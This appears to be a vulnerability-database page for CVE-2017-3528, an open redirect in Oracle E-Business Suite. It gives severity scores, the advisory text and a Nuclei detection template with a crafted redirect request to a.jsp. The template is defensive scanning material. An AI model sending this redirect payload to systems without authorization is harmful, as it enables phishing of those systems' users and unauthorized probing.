Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-3528
HistoryMay 31, 2021 - 11:23 a.m.

Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect

2021-05-3111:23:36
ProjectDiscovery
github.com
14
oracle
e-business suite
open redirect
popup windows
vulnerability
http
unauthenticated
attackers
oracle applications framework
data access

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

AI Score

5

Confidence

High

EPSS

0.009

Percentile

82.4%

‘The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.’

id: CVE-2017-3528

info:
  name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability.
  reference:
    - https://blog.zsec.uk/cve-2017-3528/
    - https://www.exploit-db.com/exploits/43592
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3528
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
    - http://www.securitytracker.com/id/1038299
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-3528
    cwe-id: CWE-601
    epss-score: 0.00865
    epss-percentile: 0.82307
    cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: applications_framework
  tags: cve,cve2017,oracle,redirect,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"

    matchers:
      - type: word
        part: body
        words:
          - 'noresize src="/\interact.sh?configName='
# digest: 4a0a00473045022100c2e8be373cdfe4833f47e0738ec1a9f260610f9aaac5a8bcd4511f8ebd39ef7a022074324b0070bd1af8ec301343eee9810571eabec58ee24f22be7a44c8eb05436e:922c64590222798bb761d5b6d8e72950

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

AI Score

5

Confidence

High

EPSS

0.009

Percentile

82.4%